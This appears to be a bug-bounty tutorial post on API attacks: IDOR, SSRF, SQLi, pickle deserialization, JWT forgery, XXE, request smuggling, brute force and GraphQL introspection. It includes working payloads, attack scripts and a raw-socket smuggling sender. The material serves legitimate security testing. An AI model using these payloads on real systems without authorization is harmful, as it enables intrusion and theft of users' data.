
API security is critical in modern web applications, and bug bounty hunters must be equipped with the right exploits to identify vulnerabilities. Below are 50 essential API bug-bounty exploits, with practical commands, code, and test steps for each; the first 15 are shown here.
You Should Know:
1. Broken Object Level Authorization (BOLA/IDOR)
- Test: Change object IDs in API requests (e.g., `/api/user/123` → `/api/user/124`) while keeping your own token; a 200 with another user's data is the finding.
- Command:
curl -H "Authorization: Bearer TOKEN" https://api.example.com/user/124
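Changing one ID by hand does not scale, and a 200 alone is not proof (some APIs answer 200 with an empty or generic body for foreign objects). The script below is an added example, not code from the original post: it fetches each object as its owner and again as an unrelated user and reports only objects whose body is identical for both. The `fetch` callable, the `/user/<id>` path, and the in-memory fake API (which serves object 124 to anyone, the bug being hunted) are constructed assumptions for an offline run.

```python
"""Differential BOLA/IDOR check: read each object as its owner and as a
second, unrelated user; objects the second user can read identically are
findings. Added example; the fake API below is constructed for the demo."""
from typing import Callable, Dict, List, Tuple

# (token, object_id) -> (status, body)
Fetch = Callable[[str, int], Tuple[int, str]]


def find_bola(fetch: Fetch, owner_token: str, attacker_token: str,
              object_ids: List[int]) -> List[int]:
    """Return object IDs the attacker reads with the same body the owner sees."""
    leaked = []
    for oid in object_ids:
        owner_status, owner_body = fetch(owner_token, oid)
        if owner_status != 200:
            continue  # missing object, or not the owner's: nothing to compare
        att_status, att_body = fetch(attacker_token, oid)
        if att_status == 200 and att_body == owner_body:
            leaked.append(oid)
    return leaked


def api_get(base_url: str) -> Fetch:
    """Build a real `fetch` with requests (assumed endpoint: GET /user/<id>)."""
    import requests  # imported lazily so the offline demo needs no network

    def _fetch(token: str, oid: int) -> Tuple[int, str]:
        r = requests.get(f"{base_url}/user/{oid}",
                         headers={"Authorization": f"Bearer {token}"},
                         timeout=10)
        return r.status_code, r.text
    return _fetch


# --- constructed fake API for an offline demonstration -------------------
FAKE_OWNERS: Dict[int, str] = {123: "tok-alice", 124: "tok-bob", 125: "tok-bob"}
FAKE_BODIES: Dict[int, str] = {123: '{"id":123,"email":"alice@example"}',
                               124: '{"id":124,"email":"bob@example"}',
                               125: '{"id":125,"email":"bob2@example"}'}
BROKEN_IDS = {124}  # the fake API serves this object to any caller (the BOLA bug)


def fake_fetch(token: str, oid: int) -> Tuple[int, str]:
    if oid not in FAKE_OWNERS:
        return 404, ""
    if FAKE_OWNERS[oid] == token or oid in BROKEN_IDS:
        return 200, FAKE_BODIES[oid]
    return 403, '{"error":"forbidden"}'


if __name__ == "__main__":
    # Bob owns 124 and 125; Alice is the attacker. Only 124 leaks.
    print(find_bola(fake_fetch, "tok-bob", "tok-alice", [123, 124, 125]))
```

Against a live target, replace `fake_fetch` with `api_get("https://api.example.com")` and use two accounts you own; the owner account is needed because the comparison, not the status code, is what separates a real BOLA from a permissive-looking 200.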
2. Server-Side Request Forgery (SSRF)
- Test: Inject internal URLs (`http://localhost`, `file:///etc/passwd`, the cloud metadata address `http://169.254.169.254/`) into any parameter that fetches a URL; compare response times and error messages when the body is not returned.
- Command:
curl -X POST -H "Content-Type: application/json" -d '{"url":"http://internal-server"}' https://api.example.com/fetch
3. SQL Injection in JSON/XML Payloads
- Test: Inject SQL via JSON, e.g. `{"user":"admin' OR '1'='1"}`. With sqlmap, mark the injection point with `*` and send the JSON content type, otherwise sqlmap does not know where to inject.
- Command:
sqlmap -u "https://api.example.com/login" -H "Content-Type: application/json" --data='{"user":"*","pass":"x"}' --risk=3 --level=5
4. Mass Assignment
- Test: Add unexpected fields (e.g., `"admin":true`, `"role":"admin"`, `"verified":true`) to create/update requests, then fetch the object back to see whether the field was persisted.
- Command:
curl -X POST -H "Content-Type: application/json" -d '{"username":"test","admin":true}' https://api.example.com/register
5. Path Traversal via File Parameters (often filed as IDOR)
- Test: Manipulate file paths (`/download?file=../../etc/passwd`). Quote the URL so the shell does not interpret `?`, and try encoded variants (`..%2f`, `%2e%2e/`) when the server normalises plain `../`.
- Command:
wget "https://api.example.com/download?file=../../../../etc/passwd"
6. Broken Authentication (Credential Brute-Force, Weak JWT Secrets)
- Test: Use `hydra` to brute-force the login endpoint (hydra guesses passwords against a form, it does not brute-force JWT tokens). Weak JWT signing secrets are cracked offline instead, with `jwt_tool <JWT> -C -d wordlist.txt` or `hashcat -m 16500`. For JSON login bodies, `ffuf` with `-d '{"user":"admin","pass":"FUZZ"}'` is easier than hydra.
- Command:
hydra -l admin -P passwords.txt api.example.com -s 443 -S -t 64 http-post-form "/login:username=^USER^&password=^PASS^:F=Invalid"
7. Insecure Deserialization
- Test: Send malicious serialized objects (Python `pickle`). `__reduce__` lets an object tell pickle which callable to run at load time, so `pickle.loads()` on attacker data is code execution. Use a harmless proof command; the original showed `rm -rf /`, which is never acceptable on a target.
- Code:
import os, pickle, base64

class Exploit:
    # pickle calls os.system(cmd) when this object is loaded
    def __reduce__(self):
        return (os.system, ('id > /tmp/pickle-poc',))  # benign proof of execution

payload = base64.b64encode(pickle.dumps(Exploit()))
print(payload.decode())  # send this where the API expects a serialized object
8. JWT "alg=none" & Weak Key Issues
- Test: Modify the JWT header to `"alg":"none"`, strip the signature, and change a claim; a server that trusts the header's algorithm accepts it.
- Command:
jwt_tool <JWT_TOKEN> -X a -I -pc name -pv admin
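Items 6 and 8 share one root cause: the server lets the token decide how it is verified, or signs with a guessable secret. The block below is an added example, not from the original post or from jwt_tool. It forges an `alg=none` token from a real one, shows a verifier that trusts the header against one that pins the algorithm, and cracks a weak HS256 secret offline. The secret, wordlist and claims are constructed demo values.

```python
"""alg=none forgery, a naive versus a pinned verifier, and offline HS256
secret cracking. Added example; all values below are constructed."""
import base64
import hashlib
import hmac
import json
from typing import List, Optional


def b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def b64url_decode(s: str) -> bytes:
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))


def _segment(obj: dict) -> str:
    return b64url(json.dumps(obj, separators=(",", ":")).encode())


def sign_hs256(header: dict, payload: dict, secret: bytes) -> str:
    signing_input = _segment(header) + "." + _segment(payload)
    sig = hmac.new(secret, signing_input.encode(), hashlib.sha256).digest()
    return signing_input + "." + b64url(sig)


def forge_alg_none(token: str, **claims) -> str:
    """Rewrite header to alg=none, merge claims, keep an empty signature."""
    _, payload_b64, _ = token.split(".")
    payload = json.loads(b64url_decode(payload_b64))
    payload.update(claims)
    return _segment({"alg": "none", "typ": "JWT"}) + "." + _segment(payload) + "."


def _hs256_ok(h: str, p: str, s: str, secret: bytes) -> bool:
    expected = hmac.new(secret, f"{h}.{p}".encode(), hashlib.sha256).digest()
    return hmac.compare_digest(expected, b64url_decode(s))


def verify_naive(token: str, secret: bytes) -> Optional[dict]:
    """Vulnerable: honours the header's alg, so 'none' skips the signature."""
    h, p, s = token.split(".")
    if json.loads(b64url_decode(h)).get("alg") == "none":
        return json.loads(b64url_decode(p))
    return json.loads(b64url_decode(p)) if _hs256_ok(h, p, s, secret) else None


def verify_pinned(token: str, secret: bytes) -> Optional[dict]:
    """Hardened: the server chooses HS256; any other header alg is rejected."""
    h, p, s = token.split(".")
    if json.loads(b64url_decode(h)).get("alg") != "HS256" or not s:
        return None
    return json.loads(b64url_decode(p)) if _hs256_ok(h, p, s, secret) else None


def crack_hs256(token: str, wordlist: List[str]) -> Optional[str]:
    """Offline guessing: nothing touches the server, unlike a login brute force."""
    h, p, s = token.split(".")
    for guess in wordlist:
        if _hs256_ok(h, p, s, guess.encode()):
            return guess
    return None


# constructed demo values
SECRET = b"secret123"
WORDLIST = ["password", "secret", "secret123", "changeme"]
USER_TOKEN = sign_hs256({"alg": "HS256", "typ": "JWT"},
                        {"sub": "user42", "role": "user"}, SECRET)

if __name__ == "__main__":
    forged = forge_alg_none(USER_TOKEN, role="admin")
    print("naive  accepts forged:", verify_naive(forged, SECRET))
    print("pinned accepts forged:", verify_pinned(forged, SECRET))
    print("cracked secret:", crack_hs256(USER_TOKEN, WORDLIST))
```

The pinned verifier is the fix to report: the expected algorithm comes from server configuration, and a token whose header disagrees is rejected before any signature math happens. For real targets the crack loop is the same idea that `jwt_tool -C -d` and `hashcat -m 16500` run at speed.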
9. Cross-Origin Resource Sharing (CORS) Misconfig
- Test: Send an `Origin: https://evil.com` header and look for it reflected in `Access-Control-Allow-Origin` together with `Access-Control-Allow-Credentials: true`; that pair lets an attacker page read authenticated responses. Use `-i` (response headers plus body) rather than `-I`, since a HEAD request may be handled differently.
- Command:
curl -H "Origin: https://evil.com" -i https://api.example.com/data
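Reading the two headers by eye for every origin variant is error-prone, so here is an added example (not from the original post) that probes the usual origins, including `null` and the two regex-bypass shapes, and grades each response. `probe_cors` needs `requests` and a live URL; the header dictionaries in the demo are constructed.

```python
"""Probe CORS with several Origin values and classify each response.
Added example; the header sets in the demo are constructed."""
from typing import Dict, List, Tuple


def candidate_origins(registrable_domain: str) -> List[str]:
    """Origins worth sending for a target such as example.com."""
    return [
        "https://evil.com",                         # plain foreign origin
        "null",                                     # sandboxed iframe / file:// origin
        f"https://{registrable_domain}.evil.com",   # beats a prefix / startswith check
        f"https://evil{registrable_domain}",        # beats an endswith / unanchored regex
    ]


def classify_cors(sent_origin: str, headers: Dict[str, str]) -> str:
    """Grade one Origin/response pair."""
    h = {k.lower(): v for k, v in headers.items()}
    acao = h.get("access-control-allow-origin")
    creds = h.get("access-control-allow-credentials", "").lower() == "true"
    if acao is None:
        return "no-cors"
    if acao == "*":
        # browsers never send credentials with a wildcard: only public data is readable
        return "wildcard"
    if acao == sent_origin:
        # reflected origin plus credentials lets evil.com read the victim's data
        return "reflected-with-credentials" if creds else "reflected"
    return "allowlisted-other"


def probe_cors(url: str, registrable_domain: str) -> List[Tuple[str, str]]:
    """Send each candidate origin to a live endpoint and grade the answers."""
    import requests  # lazy import keeps the offline demo dependency-free
    results = []
    for origin in candidate_origins(registrable_domain):
        r = requests.get(url, headers={"Origin": origin}, timeout=10)
        results.append((origin, classify_cors(origin, dict(r.headers))))
    return results


if __name__ == "__main__":
    # constructed response headers standing in for a live target
    demo = {"Access-Control-Allow-Origin": "https://evil.com",
            "Access-Control-Allow-Credentials": "true"}
    print(classify_cors("https://evil.com", demo))
```

Only `reflected-with-credentials` (for an origin you control, or `null`) is a clear high-impact finding; a reflected origin without credentials, or a wildcard, exposes nothing that an unauthenticated client could not already fetch.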
10. HTTP Verb Tampering (PUT vs GET)
- Test: Change `GET` to `PUT`/`DELETE` (or `HEAD`/`OPTIONS`) on endpoints whose authorization rules are tied to a specific method.
- Command:
curl -X PUT https://api.example.com/user/delete/1
11. Business Logic Flaws
- Test: Negative price or quantity manipulation (`"price": -100`), replaying a single-use coupon, or skipping a step in a multi-stage flow.
- Command:
curl -X POST -H "Content-Type: application/json" -d '{"product":"premium","price":-100}' https://api.example.com/checkout
12. XML External Entity (XXE) Injection
- Test: Inject malicious XML; send it with `Content-Type: application/xml`, and try it against JSON endpoints too, since many frameworks parse whichever content type the request declares.
- Payload:
<?xml version="1.0"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<user>&xxe;</user>
13. HTTP Request Smuggling
- Test: Use `CL.TE` or `TE.CL` attacks. In CL.TE the front end honours `Content-Length` and forwards the whole body, while the back end honours `Transfer-Encoding: chunked`, stops at the `0` chunk, and treats the rest as the start of the next request. `Content-Length` must therefore cover the entire body (51 bytes below, with every line ending in `\r\n`); the original showed `Content-Length: 4`, which does not. Send it with a raw-socket tool (Burp Repeater with "Update Content-Length" off, or `openssl s_client`), because `curl` rewrites the framing headers.
- Request:
POST / HTTP/1.1
Host: api.example.com
Content-Length: 51
Transfer-Encoding: chunked

0

GET /admin HTTP/1.1
Host: api.example.com

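Getting the framing right by hand is where most smuggling attempts fail, so the block below is an added example (not from the original post) that builds CL.TE and TE.CL probes with a `Content-Length` computed from the actual body, and sends them over a raw TLS socket. The host, path and smuggled request are constructed placeholders; `send_raw` is not exercised offline.

```python
"""Build CL.TE and TE.CL request-smuggling probes with consistent framing and
send them over a raw TLS socket. Added example; host/path are placeholders."""
import socket
import ssl
from typing import Dict, Tuple

CRLF = "\r\n"


def _assemble(path: str, host: str, extra_headers: list, body: str) -> bytes:
    headers = [f"POST {path} HTTP/1.1", f"Host: {host}",
               "Content-Type: application/x-www-form-urlencoded"] + extra_headers
    return (CRLF.join(headers) + CRLF + CRLF + body).encode()


def build_cl_te(host: str, path: str, smuggled: str) -> bytes:
    """Front end uses Content-Length (whole body); back end uses chunked
    encoding, stops at the 0 chunk, and sees `smuggled` as the next request."""
    body = "0" + CRLF + CRLF + smuggled
    return _assemble(path, host, [f"Content-Length: {len(body.encode())}",
                                  "Transfer-Encoding: chunked"], body)


def build_te_cl(host: str, path: str, smuggled: str) -> bytes:
    """Front end uses chunked encoding (one chunk holding `smuggled`); back end
    uses a Content-Length that covers only the chunk-size line, so the chunk
    data becomes the next request."""
    size_line = f"{len(smuggled.encode()):x}"
    body = size_line + CRLF + smuggled + CRLF + "0" + CRLF + CRLF
    return _assemble(path, host, [f"Content-Length: {len(size_line) + 2}",
                                  "Transfer-Encoding: chunked"], body)


def split_request(raw: bytes) -> Tuple[Dict[str, str], bytes]:
    """Parse our own probe back into (lower-cased headers, body) for checking."""
    head, body = raw.split(b"\r\n\r\n", 1)
    lines = head.decode().split(CRLF)[1:]  # drop the request line
    hdrs = {k.strip().lower(): v.strip()
            for k, v in (line.split(":", 1) for line in lines)}
    return hdrs, body


def send_raw(host: str, data: bytes, port: int = 443, timeout: float = 10.0) -> bytes:
    """Write the probe verbatim over TLS and collect whatever comes back."""
    ctx = ssl.create_default_context()
    with socket.create_connection((host, port), timeout=timeout) as sock:
        with ctx.wrap_socket(sock, server_hostname=host) as tls:
            tls.sendall(data)
            chunks = []
            try:
                while True:
                    buf = tls.recv(4096)
                    if not buf:
                        break
                    chunks.append(buf)
            except socket.timeout:
                pass  # servers often hold the connection open; return what we have
            return b"".join(chunks)


if __name__ == "__main__":
    SMUGGLED = "GET /admin HTTP/1.1" + CRLF + "Host: api.example.com" + CRLF + CRLF
    print(build_cl_te("api.example.com", "/", SMUGGLED).decode())
```

Confirm a desync with a timing probe first (a CL.TE back end waits for more chunk data when the body is cut short) and then send the probe twice in quick succession: the second response answering the smuggled `/admin` request is the evidence. Every probe you send is still a request to a production front end, so keep the smuggled prefix harmless.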
14. Rate-Limit Bypass (IP Rotation, Header Tricks)
- Test: Rotate `X-Forwarded-For` (and `X-Real-IP`, `X-Originating-IP`) values on each request; a limiter that keys on these headers instead of the real client IP resets every time.
- Command:
curl -H "X-Forwarded-For: 1.1.1.1" https://api.example.com/login
15. GraphQL Introspection & Injection
- Test: Query `__schema` to enumerate every type, query and mutation, including ones the client never calls.
- Command:
curl -X POST -H "Content-Type: application/json" -d '{"query":"{__schema{types{name}}}"}' https://api.example.com/graphql
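Type names alone are not the attack surface; the root queries and mutations and their argument types are. The block below is an added example (not from the original post) that runs a fuller introspection query and flattens the result into `name(arg: Type!)` signatures ready for fuzzing. The endpoint is a placeholder, `fetch_schema` needs `requests` and a live target, and the embedded introspection response is constructed.

```python
"""Turn a GraphQL introspection result into a list of root operations with
argument types. Added example; the sample schema below is constructed."""
from typing import Dict, List, Optional

INTROSPECTION = """
query {
  __schema {
    queryType { name }
    mutationType { name }
    types {
      name
      fields {
        name
        args { name type { name kind ofType { name kind ofType { name kind } } } }
      }
    }
  }
}
"""


def _type_name(t: Dict) -> str:
    """Unwrap NON_NULL/LIST wrappers into GraphQL notation, e.g. [ID!]!."""
    suffix = ""
    while t and t.get("kind") in ("NON_NULL", "LIST"):
        suffix = ("!" if t["kind"] == "NON_NULL" else "[]") + suffix
        t = t.get("ofType") or {}
    return (t.get("name") or "?") + suffix


def root_operations(schema: Dict) -> Dict[str, List[str]]:
    """Return {'query': ['user(id: ID!)', ...], 'mutation': [...]}."""
    roots = {"query": (schema.get("queryType") or {}).get("name"),
             "mutation": (schema.get("mutationType") or {}).get("name")}
    by_name = {t["name"]: t for t in schema["types"]}
    out: Dict[str, List[str]] = {}
    for op, tname in roots.items():
        out[op] = []
        if not tname or tname not in by_name:
            continue  # e.g. no mutations exposed
        for f in by_name[tname].get("fields") or []:
            args = ", ".join(f"{a['name']}: {_type_name(a['type'])}"
                             for a in f.get("args") or [])
            out[op].append(f"{f['name']}({args})")
    return out


def fetch_schema(url: str, token: Optional[str] = None) -> Dict:
    """POST the introspection query to a live endpoint (assumed placeholder URL)."""
    import requests  # lazy import keeps the offline demo dependency-free
    headers = {"Content-Type": "application/json"}
    if token:
        headers["Authorization"] = f"Bearer {token}"
    r = requests.post(url, json={"query": INTROSPECTION}, headers=headers, timeout=10)
    r.raise_for_status()
    return r.json()["data"]["__schema"]


# constructed introspection response standing in for a live target
NON_NULL_ID = {"name": None, "kind": "NON_NULL",
               "ofType": {"name": "ID", "kind": "SCALAR", "ofType": None}}
SAMPLE_SCHEMA = {
    "queryType": {"name": "Query"},
    "mutationType": {"name": "Mutation"},
    "types": [
        {"name": "Query", "fields": [
            {"name": "user", "args": [{"name": "id", "type": NON_NULL_ID}]},
            {"name": "me", "args": []}]},
        {"name": "Mutation", "fields": [
            {"name": "setRole", "args": [
                {"name": "userId", "type": NON_NULL_ID},
                {"name": "role", "type": {"name": "String", "kind": "SCALAR", "ofType": None}}]}]},
        {"name": "ID", "fields": None},
        {"name": "String", "fields": None},
    ],
}

if __name__ == "__main__":
    for op, sigs in root_operations(SAMPLE_SCHEMA).items():
        print(op, sigs)
```

A mutation such as `setRole(userId: ID!, role: String)` that the front end never calls is exactly where to start the BOLA and mass-assignment tests from earlier in the list.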
(Continues with more exploits…)
What Undercode Say:
API security is a goldmine for bug bounty hunters. Always test within the program's scope and rules, automate with tools like Burp Suite, ffuf, and sqlmap, and stay current with the OWASP API Security Top 10.
Expected Output:
- Exploits Verified: BOLA, SSRF, SQLi, JWT flaws, XXE.
- Tools Used: curl, sqlmap, jwt_tool, hydra.
- Critical Findings: IDOR, Mass Assignment, SSRF.
Prediction:
API attacks will grow as microservices and cloud-native apps expand. Expect more automation in API fuzzing and AI-driven exploit generation.
Reported By: Wesley Thijs – Hackers Feeds